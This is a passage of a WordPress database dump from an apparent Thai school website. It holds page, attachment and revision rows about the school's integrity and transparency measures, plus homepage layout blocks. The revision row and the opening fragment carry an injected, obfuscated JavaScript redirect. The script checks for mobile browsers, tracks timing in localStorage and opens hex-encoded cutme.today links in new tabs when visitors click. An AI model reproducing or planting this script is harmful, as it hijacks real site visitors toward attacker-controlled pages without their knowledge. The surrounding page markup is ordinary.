_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน','','publish','closed','closed','','%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1','','','2024-08-21 10:01:02','2024-08-21 03:01:02','',0,'http://pakhaeng.ssk.in.th/?page_id=1036',0,'page','',0),
(1037,1,'2024-08-21 10:00:53','2024-08-21 03:00:53','','มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน','','inherit','','closed','','%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1-2','','','2024-08-21 10:00:53','2024-08-21 03:00:53','',1036,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf',0,'attachment','application/pdf',0),
(1038,1,'2024-08-21 10:01:00','2024-08-21 03:01:00','<!-- wp:file {\"id\":1037,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน\"></object><a id=\"wp-block-file--media-542a3402-80d1-4f72-b19d-ca93d9a54dde\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-542a3402-80d1-4f72-b19d-ca93d9a54dde\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน','','inherit','closed','closed','','1036-revision-v1','','','2024-08-21 10:01:00','2024-08-21 03:01:00','',1036,'http://pakhaeng.ssk.in.th/?p=1038',0,'revision','',0),
(1039,1,'2024-08-21 10:01:17','2024-08-21 03:01:17','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container 